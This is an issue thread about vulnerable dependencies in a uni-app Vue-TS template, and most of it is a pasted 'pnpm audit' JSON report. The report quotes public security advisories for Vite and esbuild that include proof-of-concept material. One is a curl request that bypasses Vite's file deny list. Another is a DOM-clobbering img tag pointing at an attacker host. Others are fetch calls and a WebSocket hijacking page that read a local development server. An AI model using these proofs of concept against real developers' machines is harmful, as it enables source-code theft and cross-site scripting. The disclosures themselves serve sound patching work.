pnpm audit报告漏洞太多
Opened this issue · 4 comments
ixqbar commented
Bug 描述
使用dcloudio/uni-preset-vue 初始化vue-ts工程目录后pnpm audit --json
"vulnerabilities": {
"info": 0,
"low": 2,
"moderate": 13,
"high": 3,
"critical": 0
},
复现步骤
pnpm audit --json
预期结果
No response
实际结果
No response
chouchouji commented
可以分析一下具体是哪些依赖库的版本有问题,非uniapp相关的依赖欢迎在官方github仓库提pr升级
ixqbar commented
可以分析一下具体是哪些依赖库的版本有问题,非uniapp相关的依赖欢迎在官方github仓库提pr升级
{
"actions": [
{
"action": "review",
"module": "jpeg-js",
"resolves": [
{
"id": 1088964,
"path": ".>@dcloudio/uni-mp-baidu>jimp>@jimp/types>@jimp/jpeg>jpeg-js",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1093580,
"path": ".>@dcloudio/uni-mp-baidu>jimp>@jimp/types>@jimp/jpeg>jpeg-js",
"dev": false,
"optional": false,
"bundled": false
}
]
},
{
"action": "review",
"module": "phin",
"resolves": [
{
"id": 1096967,
"path": ".>@dcloudio/uni-mp-baidu>jimp>@jimp/custom>@jimp/core>phin",
"dev": false,
"optional": false,
"bundled": false
}
]
},
{
"action": "review",
"module": "vue-template-compiler",
"resolves": [
{
"id": 1098721,
"path": ".>vue-tsc>@vue/language-core>vue-template-compiler",
"dev": false,
"bundled": false,
"optional": false
}
]
},
{
"action": "review",
"module": "vite",
"resolves": [
{
"id": 1099688,
"path": ".>vite",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1099691,
"path": ".>vite",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1102437,
"path": ".>vite",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1103517,
"path": ".>vite",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1103628,
"path": ".>vite",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1103884,
"path": ".>vite",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1104173,
"path": ".>vite",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1104202,
"path": ".>vite",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1107323,
"path": ".>vite",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1107327,
"path": ".>vite",
"dev": false,
"optional": false,
"bundled": false
}
]
},
{
"action": "review",
"module": "esbuild",
"resolves": [
{
"id": 1102341,
"path": ".>@dcloudio/uni-cli-shared>esbuild",
"dev": false,
"optional": false,
"bundled": false
}
]
},
{
"action": "review",
"module": "@intlify/core-base",
"resolves": [
{
"id": 1102467,
"path": ".>@dcloudio/uni-cli-shared>@intlify/core-base",
"dev": false,
"optional": false,
"bundled": false
},
{
"id": 1106453,
"path": ".>@dcloudio/uni-cli-shared>@intlify/core-base",
"dev": false,
"optional": false,
"bundled": false
}
]
},
{
"action": "review",
"module": "@intlify/message-resolver",
"resolves": [
{
"id": 1102471,
"path": ".>@dcloudio/uni-cli-shared>@intlify/core-base>@intlify/message-resolver",
"dev": false,
"optional": false,
"bundled": false
}
]
}
],
"advisories": {
"1088964": {
"findings": [
{
"version": "0.3.7",
"paths": [
".>@dcloudio/uni-mp-baidu>jimp>@jimp/types>@jimp/jpeg>jpeg-js"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://nvd.nist.gov/vuln/detail/CVE-2022-25851\n- https://github.com/jpeg-js/jpeg-js/issues/105\n- https://github.com/jpeg-js/jpeg-js/pull/106/\n- https://github.com/jpeg-js/jpeg-js/commit/9ccd35fb5f55a6c4f1902ac5b0f270f675750c27\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2860295\n- https://snyk.io/vuln/SNYK-JS-JPEGJS-2859218\n- https://github.com/advisories/GHSA-xvf7-4v9q-58w6",
"created": "2022-06-11T00:00:17.000Z",
"id": 1088964,
"npm_advisory_id": null,
"overview": "The package jpeg-js before 0.4.4 is vulnerable to Denial of Service (DoS) where a particular piece of input will cause the program to enter an infinite loop and never return.",
"reported_by": null,
"title": "Infinite loop in jpeg-js",
"metadata": null,
"cves": [
"CVE-2022-25851"
],
"access": "public",
"severity": "high",
"module_name": "jpeg-js",
"vulnerable_versions": "<0.4.4",
"github_advisory_id": "GHSA-xvf7-4v9q-58w6",
"recommendation": "Upgrade to version 0.4.4 or later",
"patched_versions": ">=0.4.4",
"updated": "2023-01-27T05:03:30.000Z",
"cvss": {
"score": 7.5,
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
},
"cwe": [
"CWE-835"
],
"url": "https://github.com/advisories/GHSA-xvf7-4v9q-58w6"
},
"1093580": {
"findings": [
{
"version": "0.3.7",
"paths": [
".>@dcloudio/uni-mp-baidu>jimp>@jimp/types>@jimp/jpeg>jpeg-js"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://nvd.nist.gov/vuln/detail/CVE-2020-8175\n- https://github.com/eugeneware/jpeg-js/commit/135705b1510afb6cb4275a4655d92c58f6843e79\n- https://hackerone.com/reports/842462\n- https://github.com/advisories/GHSA-w7q9-p3jq-fmhm",
"created": "2020-07-27T15:46:57.000Z",
"id": 1093580,
"npm_advisory_id": null,
"overview": "Uncontrolled resource consumption in `jpeg-js` before 0.4.0 may allow attacker to launch denial of service attacks using specially a crafted JPEG image.",
"reported_by": null,
"title": "Uncontrolled resource consumption in jpeg-js",
"metadata": null,
"cves": [
"CVE-2020-8175"
],
"access": "public",
"severity": "moderate",
"module_name": "jpeg-js",
"vulnerable_versions": "<0.4.0",
"github_advisory_id": "GHSA-w7q9-p3jq-fmhm",
"recommendation": "Upgrade to version 0.4.0 or later",
"patched_versions": ">=0.4.0",
"updated": "2023-09-08T22:35:58.000Z",
"cvss": {
"score": 5.5,
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
},
"cwe": [
"CWE-400"
],
"url": "https://github.com/advisories/GHSA-w7q9-p3jq-fmhm"
},
"1096967": {
"findings": [
{
"version": "2.9.3",
"paths": [
".>@dcloudio/uni-mp-baidu>jimp>@jimp/custom>@jimp/core>phin"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/ethanent/phin/security/advisories/GHSA-x565-32qp-m3vf\n- https://github.com/ethanent/phin/commit/c071f95336a987dad9332fd388adeb249925cc57\n- https://github.com/advisories/GHSA-x565-32qp-m3vf",
"created": "2024-04-11T21:30:30.000Z",
"id": 1096967,
"npm_advisory_id": null,
"overview": "### Impact\n\nUsers may be impacted if sending requests including sensitive data in specific headers with `followRedirects` enabled.\n\n### Patches\n\nThe [follow-redirects](https://github.com/follow-redirects/follow-redirects) library is now being used for redirects and removes some headers that may contain sensitive information in some situations.\n\n### Workarounds\n\nN/A. Please update to resolve the issue.",
"reported_by": null,
"title": "phin may include sensitive headers in subsequent requests after redirect",
"metadata": null,
"cves": [],
"access": "public",
"severity": "moderate",
"module_name": "phin",
"vulnerable_versions": "<3.7.1",
"github_advisory_id": "GHSA-x565-32qp-m3vf",
"recommendation": "Upgrade to version 3.7.1 or later",
"patched_versions": ">=3.7.1",
"updated": "2024-04-11T21:30:32.000Z",
"cvss": {
"score": 4.3,
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
},
"cwe": [
"CWE-200"
],
"url": "https://github.com/advisories/GHSA-x565-32qp-m3vf"
},
"1098721": {
"findings": [
{
"version": "2.7.16",
"paths": [
".>vue-tsc>@vue/language-core>vue-template-compiler"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://nvd.nist.gov/vuln/detail/CVE-2024-6783\n- https://www.herodevs.com/vulnerability-directory/cve-2024-6783\n- https://github.com/advisories/GHSA-g3ch-rx76-35fx",
"created": "2024-07-23T15:31:09.000Z",
"id": 1098721,
"npm_advisory_id": null,
"overview": "A vulnerability has been discovered in vue-template-compiler, that allows an attacker to perform XSS via prototype pollution. The attacker could change the prototype chain of some properties such as `Object.prototype.staticClass` or `Object.prototype.staticStyle` to execute arbitrary JavaScript code. Vue 2 has reached End-of-Life. This vulnerability has been patched in Vue 3.",
"reported_by": null,
"title": "vue-template-compiler vulnerable to client-side Cross-Site Scripting (XSS)",
"metadata": null,
"cves": [
"CVE-2024-6783"
],
"access": "public",
"severity": "moderate",
"module_name": "vue-template-compiler",
"vulnerable_versions": ">=2.0.0 <3.0.0",
"github_advisory_id": "GHSA-g3ch-rx76-35fx",
"recommendation": "Upgrade to version 3.0.0 or later",
"patched_versions": ">=3.0.0",
"updated": "2024-08-30T15:45:16.000Z",
"cvss": {
"score": 4.2,
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
},
"cwe": [
"CWE-79"
],
"url": "https://github.com/advisories/GHSA-g3ch-rx76-35fx"
},
"1099688": {
"findings": [
{
"version": "5.2.8",
"paths": [
".>vite"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx\n- https://github.com/vitejs/vite/commit/4573a6fd6f1b097fb7296a3e135e0646b996b249\n- https://github.com/vitejs/vite/commit/6820bb3b9a54334f3268fc5ee1e967d2e1c0db34\n- https://github.com/vitejs/vite/commit/8339d7408668686bae56eaccbfdc7b87612904bd\n- https://github.com/vitejs/vite/commit/a6da45082b6e73ddfdcdcc06bb5414f976a388d6\n- https://github.com/vitejs/vite/commit/b901438f99e667f76662840826eec91c8ab3b3e7\n- https://nvd.nist.gov/vuln/detail/CVE-2024-45811\n- https://github.com/advisories/GHSA-9cwx-2883-4wfx",
"created": "2024-09-17T18:44:12.000Z",
"id": 1099688,
"npm_advisory_id": null,
"overview": "### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.\n\n### PoC\n```sh\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n <body>\n <h1>403 Restricted</h1>\n <p>The request url "/tmp/secret.txt" is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```\n\n",
"reported_by": null,
"title": "Vite's `server.fs.deny` is bypassed when using `?import&raw`",
"metadata": null,
"cves": [
"CVE-2024-45811"
],
"access": "public",
"severity": "moderate",
"module_name": "vite",
"vulnerable_versions": ">=5.2.0 <5.2.14",
"github_advisory_id": "GHSA-9cwx-2883-4wfx",
"recommendation": "Upgrade to version 5.2.14 or later",
"patched_versions": ">=5.2.14",
"updated": "2024-09-19T18:34:34.000Z",
"cvss": {
"score": 5.3,
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
},
"cwe": [
"CWE-200",
"CWE-284"
],
"url": "https://github.com/advisories/GHSA-9cwx-2883-4wfx"
},
"1099691": {
"findings": [
{
"version": "5.2.8",
"paths": [
".>vite"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3\n- https://github.com/vitejs/vite/commit/179b17773cf35c73ddb041f9e6c703fd9f3126af\n- https://github.com/vitejs/vite/commit/2691bb3ff6b073b41fb9046909e1e03a74e36675\n- https://github.com/vitejs/vite/commit/2ddd8541ec3b2d2e5b698749e0f2362ef28056bd\n- https://github.com/vitejs/vite/commit/e8127166979e7ace6eeaa2c3b733c8994caa31f3\n- https://github.com/vitejs/vite/commit/ebb94c5b3bf41950f45562595adec117a4d0ba5e\n- https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\n- https://nvd.nist.gov/vuln/detail/CVE-2024-45812\n- https://github.com/vitejs/vite/commit/ade1d89660e17eedfd35652165b0c26905259fad\n- https://research.securitum.com/xss-in-amp4email-dom-clobbering\n- https://scnps.co/papers/sp23_domclob.pdf\n- https://github.com/advisories/GHSA-64vr-g452-qvp3",
"created": "2024-09-17T19:28:01.000Z",
"id": 1099691,
"npm_advisory_id": null,
"overview": "### Summary\n\nWe discovered a DOM Clobbering vulnerability in Vite when building scripts to `cjs`/`iife`/`umd` output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.\n\nNote that, we have identified similar security issues in Webpack: https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\n\n### Details\n\n**Backgrounds**\n\nDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:\n\n[1] https://scnps.co/papers/sp23_domclob.pdf\n[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/\n\n**Gadgets found in Vite**\n\nWe have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to `cjs`, `iife`, or `umd`. In such cases, Vite replaces relative paths starting with `__VITE_ASSET__` using the URL retrieved from `document.currentScript`.\n\nHowever, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.\n\n```\nconst relativeUrlMechanisms = {\n amd: (relativePath) => {\n if (relativePath[0] !== \".\") relativePath = \"./\" + relativePath;\n return getResolveUrl(\n `require.toUrl('${escapeId(relativePath)}'), document.baseURI`\n );\n },\n cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(\n relativePath\n )} : ${getRelativeUrlFromDocument(relativePath)})`,\n es: (relativePath) => getResolveUrl(\n `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`\n ),\n iife: (relativePath) => getRelativeUrlFromDocument(relativePath),\n // NOTE: make sure rollup generate `module` params\n system: (relativePath) => getResolveUrl(\n `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`\n ),\n umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(\n relativePath\n )} : ${getRelativeUrlFromDocument(relativePath, true)})`\n};\n```\n\n### PoC\n\nConsidering a website that contains the following `main.js` script, the devloper decides to use the Vite to bundle up the program with the following configuration. \n\n```\n// main.js\nimport extraURL from './extra.js?url'\nvar s = document.createElement('script')\ns.src = extraURL\ndocument.head.append(s)\n```\n\n```\n// extra.js\nexport default \"https://myserver/justAnOther.js\"\n```\n\n```\n// vite.config.js\nimport { defineConfig } from 'vite'\n\nexport default defineConfig({\n build: {\n assetsInlineLimit: 0, // To avoid inline assets for PoC\n rollupOptions: {\n output: {\n format: \"cjs\"\n },\n },\n },\n base: \"./\",\n});\n```\n\nAfter running the build command, the developer will get following bundle as the output.\n\n```\n// dist/index-DDmIg9VD.js\n\"use strict\";const t=\"\"+(typeof document>\"u\"?require(\"url\").pathToFileURL(__dirname+\"/extra-BLVEx9Lb.js\").href:new URL(\"extra-BLVEx9Lb.js\",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement(\"script\");e.src=t;document.head.append(e);\n```\n\nAdding the Vite bundled script, `dist/index-DDmIg9VD.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.\n\n\n```\n<!DOCTYPE html>\n<html>\n<head>\n <title>Vite Example</title>\n <!-- Attacker-controlled Script-less HTML Element starts--!>\n <img name=\"currentScript\" src=\"https://attacker.controlled.server/\"></img>\n <!-- Attacker-controlled Script-less HTML Element ends--!>\n</head>\n<script type=\"module\" crossorigin src=\"/assets/index-DDmIg9VD.js\"></script>\n<body>\n</body>\n</html>\n```\n\n### Impact\n\nThis vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of `cjs`, `iife`, or `umd`) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.\n\n### Patch\n\n```\n// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296\nconst getRelativeUrlFromDocument = (relativePath: string, umd = false) =>\n getResolveUrl(\n `'${escapeId(partialEncodeURIPath(relativePath))}', ${\n umd ? `typeof document === 'undefined' ? location.href : ` : ''\n }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,\n )\n```",
"reported_by": null,
"title": "Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS",
"metadata": null,
"cves": [
"CVE-2024-45812"
],
"access": "public",
"severity": "moderate",
"module_name": "vite",
"vulnerable_versions": ">=5.2.0 <5.2.14",
"github_advisory_id": "GHSA-64vr-g452-qvp3",
"recommendation": "Upgrade to version 5.2.14 or later",
"patched_versions": ">=5.2.14",
"updated": "2024-09-19T18:33:22.000Z",
"cvss": {
"score": 6.4,
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H"
},
"cwe": [
"CWE-79"
],
"url": "https://github.com/advisories/GHSA-64vr-g452-qvp3"
},
"1102341": {
"findings": [
{
"version": "0.20.2",
"paths": [
".>@dcloudio/uni-cli-shared>esbuild"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99\n- https://github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d\n- https://github.com/advisories/GHSA-67mh-4wv8-2f99",
"created": "2025-02-10T17:48:07.000Z",
"id": 1102341,
"npm_advisory_id": null,
"overview": "### Summary\n\nesbuild allows any websites to send any request to the development server and read the response due to default CORS settings.\n\n### Details\n\nesbuild sets `Access-Control-Allow-Origin: *` header to all requests, including the SSE connection, which allows any websites to send any request to the development server and read the response.\n\nhttps://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L121\nhttps://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L363\n\n**Attack scenario**:\n\n1. The attacker serves a malicious web page (`http://malicious.example.com`).\n1. The user accesses the malicious web page.\n1. The attacker sends a `fetch('http://127.0.0.1:8000/main.js')` request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above.\n1. The attacker gets the content of `http://127.0.0.1:8000/main.js`.\n\nIn this scenario, I assumed that the attacker knows the URL of the bundle output file name. But the attacker can also get that information by\n\n- Fetching `/index.html`: normally you have a script tag here\n- Fetching `/assets`: it's common to have a `assets` directory when you have JS files and CSS files in a different directory and the directory listing feature tells the attacker the list of files\n- Connecting `/esbuild` SSE endpoint: the SSE endpoint sends the URL path of the changed files when the file is changed (`new EventSource('/esbuild').addEventListener('change', e => console.log(e.type, e.data))`)\n- Fetching URLs in the known file: once the attacker knows one file, the attacker can know the URLs imported from that file\n\nThe scenario above fetches the compiled content, but if the victim has the source map option enabled, the attacker can also get the non-compiled content by fetching the source map file.\n\n### PoC\n\n1. Download [reproduction.zip](https://github.com/user-attachments/files/18561484/reproduction.zip)\n2. Extract it and move to that directory\n1. Run `npm i`\n1. Run `npm run watch`\n1. Run `fetch('http://127.0.0.1:8000/app.js').then(r => r.text()).then(content => console.log(content))` in a different website's dev tools.\n\n\n\n### Impact\n\nUsers using the serve feature may get the source code stolen by malicious websites.",
"reported_by": null,
"title": "esbuild enables any website to send any requests to the development server and read the response",
"metadata": null,
"cves": [],
"access": "public",
"severity": "moderate",
"module_name": "esbuild",
"vulnerable_versions": "<=0.24.2",
"github_advisory_id": "GHSA-67mh-4wv8-2f99",
"recommendation": "Upgrade to version 0.25.0 or later",
"patched_versions": ">=0.25.0",
"updated": "2025-02-10T17:48:08.000Z",
"cvss": {
"score": 5.3,
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
},
"cwe": [
"CWE-346"
],
"url": "https://github.com/advisories/GHSA-67mh-4wv8-2f99"
},
"1102437": {
"findings": [
{
"version": "5.2.8",
"paths": [
".>vite"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rcgg-rjx6\n- https://nvd.nist.gov/vuln/detail/CVE-2025-24010\n- https://github.com/advisories/GHSA-vg6x-rcgg-rjx6",
"created": "2025-01-21T19:52:55.000Z",
"id": 1102437,
"npm_advisory_id": null,
"overview": "### Summary\nVite allowed any websites to send any requests to the development server and read the response due to default CORS settings and lack of validation on the Origin header for WebSocket connections.\n\n> [!WARNING]\n> This vulnerability even applies to users that only run the Vite dev server on the local machine and does not expose the dev server to the network.\n\n### Upgrade Path\nUsers that does not match either of the following conditions should be able to upgrade to a newer version of Vite that fixes the vulnerability without any additional configuration.\n\n- Using the backend integration feature\n- Using a reverse proxy in front of Vite\n- Accessing the development server via a domain other than `localhost` or `*.localhost`\n- Using a plugin / framework that connects to the WebSocket server on their own from the browser\n\n#### Using the backend integration feature\nIf you are using the backend integration feature and not setting [`server.origin`](https://vite.dev/config/server-options.html#server-origin), you need to add the origin of the backend server to the [`server.cors.origin`](https://github.com/expressjs/cors#configuration-options) option. Make sure to set a specific origin rather than `*`, otherwise any origin can access your development server.\n\n#### Using a reverse proxy in front of Vite\nIf you are using a reverse proxy in front of Vite and sending requests to Vite with a hostname other than `localhost` or `*.localhost`, you need to add the hostname to the new [`server.allowedHosts`](https://vite.dev/config/server-options.html#server-allowedhosts) option. For example, if the reverse proxy is sending requests to `http://vite:5173`, you need to add `vite` to the `server.allowedHosts` option.\n\n#### Accessing the development server via a domain other than `localhost` or `*.localhost`\nYou need to add the hostname to the new [`server.allowedHosts`](https://vite.dev/config/server-options.html#server-allowedhosts) option. For example, if you are accessing the development server via `http://foo.example.com:8080`, you need to add `foo.example.com` to the `server.allowedHosts` option.\n\n#### Using a plugin / framework that connects to the WebSocket server on their own from the browser\nIf you are using a plugin / framework, try upgrading to a newer version of Vite that fixes the vulnerability. If the WebSocket connection appears not to be working, the plugin / framework may have a code that connects to the WebSocket server on their own from the browser.\n\nIn that case, you can either:\n\n- fix the plugin / framework code to the make it compatible with the new version of Vite\n- set `legacy.skipWebSocketTokenCheck: true` to opt-out the fix for [2] while the plugin / framework is incompatible with the new version of Vite\n - When enabling this option, **make sure that you are aware of the security implications** described in the impact section of [2] above.\n\n### Mitigation without upgrading Vite\n#### [1]: Permissive default CORS settings\nSet `server.cors` to `false` or limit `server.cors.origin` to trusted origins.\n\n#### [2]: Lack of validation on the Origin header for WebSocket connections\nThere aren't any mitigations for this.\n\n#### [3]: Lack of validation on the Host header for HTTP requests\nUse Chrome 94+ or use HTTPS for the development server.\n\n### Details\n\nThere are three causes that allowed malicious websites to send any requests to the development server:\n\n#### [1]: Permissive default CORS settings\n\nVite sets the [`Access-Control-Allow-Origin`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin) header depending on [`server.cors`](https://vite.dev/config/server-options.html#server-cors) option. The default value was `true` which sets `Access-Control-Allow-Origin: *`. This allows websites on any origin to `fetch` contents served on the development server.\n\nAttack scenario:\n\n1. The attacker serves a malicious web page (`http://malicious.example.com`).\n2. The user accesses the malicious web page.\n3. The attacker sends a `fetch('http://127.0.0.1:5173/main.js')` request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above.\n4. The attacker gets the content of `http://127.0.0.1:5173/main.js`.\n\n#### [2]: Lack of validation on the Origin header for WebSocket connections\n\nVite starts a WebSocket server to handle HMR and other functionalities. This WebSocket server [did not perform validation on the Origin header](https://github.com/vitejs/vite/blob/v6.0.7/packages/vite/src/node/server/ws.ts#L145-L157) and was vulnerable to Cross-Site WebSocket Hijacking (CSWSH) attacks. With that attack, an attacker can read and write messages on the WebSocket connection. Vite only sends some information over the WebSocket connection ([list of the file paths that changed, the file content where the errored happened, etc.](https://github.com/vitejs/vite/blob/v6.0.7/packages/vite/types/hmrPayload.d.ts#L12-L72)), but plugins can send arbitrary messages and may include more sensitive information.\n\nAttack scenario:\n\n1. The attacker serves a malicious web page (`http://malicious.example.com`).\n2. The user accesses the malicious web page.\n3. The attacker runs `new WebSocket('http://127.0.0.1:5173', 'vite-hmr')` by JS in that malicious web page.\n4. The user edits some files.\n5. Vite sends some HMR messages over WebSocket.\n6. The attacker gets the content of the HMR messages.\n\n#### [3]: Lack of validation on the Host header for HTTP requests\n\nUnless [`server.https`](https://vite.dev/config/server-options.html#server-https) is set, Vite starts the development server on HTTP. Non-HTTPS servers are vulnerable to DNS rebinding attacks without validation on the Host header. But Vite did not perform validation on the Host header. By exploiting this vulnerability, an attacker can send arbitrary requests to the development server bypassing the same-origin policy.\n\n1. The attacker serves a malicious web page that is served on **HTTP** (`http://malicious.example.com:5173`) (HTTPS won't work).\n2. The user accesses the malicious web page.\n3. The attacker changes the DNS to point to 127.0.0.1 (or other private addresses).\n4. The attacker sends a `fetch('/main.js')` request by JS in that malicious web page.\n5. The attacker gets the content of `http://127.0.0.1:5173/main.js` bypassing the same origin policy.\n\n### Impact\n#### [1]: Permissive default CORS settings\nUsers with the default `server.cors` option may:\n\n- get the source code stolen by malicious websites\n- give the attacker access to functionalities that are not supposed to be exposed externally\n - Vite core does not have any functionality that causes changes somewhere else when receiving a request, but plugins may implement those functionalities and servers behind `server.proxy` may have those functionalities.\n\n#### [2]: Lack of validation on the Origin header for WebSocket connections\nAll users may get the file paths of the files that changed and the file content where the error happened be stolen by malicious websites.\n\nFor users that is using a plugin that sends messages over WebSocket, that content may be stolen by malicious websites.\n\nFor users that is using a plugin that has a functionality that is triggered by messages over WebSocket, that functionality may be exploited by malicious websites.\n\n#### [3]: Lack of validation on the Host header for HTTP requests\nUsers using HTTP for the development server and using a browser that is not Chrome 94+ may:\n\n- get the source code stolen by malicious websites\n- give the attacker access to functionalities that are not supposed to be exposed externally\n - Vite core does not have any functionality that causes changes somewhere else when receiving a request, but plugins may implement those functionalities and servers behind `server.proxy` may have those functionalities.\n\nChrome 94+ users are not affected for [3], because [sending a request to a private network page from public non-HTTPS page is forbidden](https://developer.chrome.com/blog/private-network-access-update#chrome_94) since Chrome 94.\n\n### Related Information\nSafari has [a bug that blocks requests to loopback addresses from HTTPS origins](https://bugs.webkit.org/show_bug.cgi?id=171934). This means when the user is using Safari and Vite is listening on lookback addresses, there's another condition of \"the malicious web page is served on HTTP\" to make [1] and [2] to work.\n\n### PoC\n#### [2]: Lack of validation on the Origin header for WebSocket connections\n1. I used the `react` template which utilizes HMR functionality.\n\n```\nnpm create vite@latest my-vue-app-react -- --template react\n```\n\n2. Then on a malicious server, serve the following POC html:\n```html\n<!doctype html>\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\" />\n <title>vite CSWSH</title>\n </head>\n <body>\n <div id=\"logs\"></div>\n <script>\n const div = document.querySelectorAll('#logs')[0];\n const ws = new WebSocket('ws://localhost:5173','vite-hmr');\n ws.onmessage = event => {\n const logLine = document.createElement('p');\n logLine.innerHTML = event.data;\n div.append(logLine);\n };\n </script>\n </body>\n</html>\n```\n\n3. Kick off Vite \n\n```\nnpm run dev\n```\n\n4. Load the development server (open `http://localhost:5173/`) as well as the malicious page in the browser. \n5. Edit `src/App.jsx` file and intentionally place a syntax error\n6. Notice how the malicious page can view the websocket messages and a snippet of the source code is exposed\n\nHere's a video demonstrating the POC:\n\nhttps://github.com/user-attachments/assets/a4ad05cd-0b34-461c-9ff6-d7c8663d6961",
"reported_by": null,
"title": "Websites were able to send any requests to the development server and read the response in vite",
"metadata": null,
"cves": [
"CVE-2025-24010"
],
"access": "public",
"severity": "moderate",
"module_name": "vite",
"vulnerable_versions": ">=5.0.0 <=5.4.11",
"github_advisory_id": "GHSA-vg6x-rcgg-rjx6",
"recommendation": "Upgrade to version 5.4.12 or later",
"patched_versions": ">=5.4.12",
"updated": "2025-02-07T17:39:00.000Z",
"cvss": {
"score": 6.5,
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
},
"cwe": [
"CWE-346",
"CWE-350",
"CWE-1385"
],
"url": "https://github.com/advisories/GHSA-vg6x-rcgg-rjx6"
},
"1102467": {
"findings": [
{
"version": "9.1.9",
"paths": [
".>@dcloudio/uni-cli-shared>@intlify/core-base"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/intlify/vue-i18n/security/advisories/GHSA-p2ph-7g93-hw3m\n- https://github.com/intlify/vue-i18n/commit/d21e06a7440eed8ada7f522b22fcf830b98d3a53\n- https://github.com/intlify/vue-i18n/commit/fbda9988d3ddd3a1a21740d506d2c183d6b6e36a\n- https://github.com/intlify/vue-i18n/commit/feaf13fcff427f2cb1d5ec8076e639506ba28f9e\n- https://github.com/intlify/vue-i18n/releases/tag/v10.0.6\n- https://github.com/intlify/vue-i18n/releases/tag/v11.1.2\n- https://github.com/intlify/vue-i18n/releases/tag/v9.14.3\n- https://nvd.nist.gov/vuln/detail/CVE-2025-27597\n- https://github.com/intlify/vue-i18n/commit/4bb6eacda7fc2cde5687549afa0efb27ca40862a\n- https://github.com/advisories/GHSA-p2ph-7g93-hw3m",
"created": "2025-03-07T15:58:24.000Z",
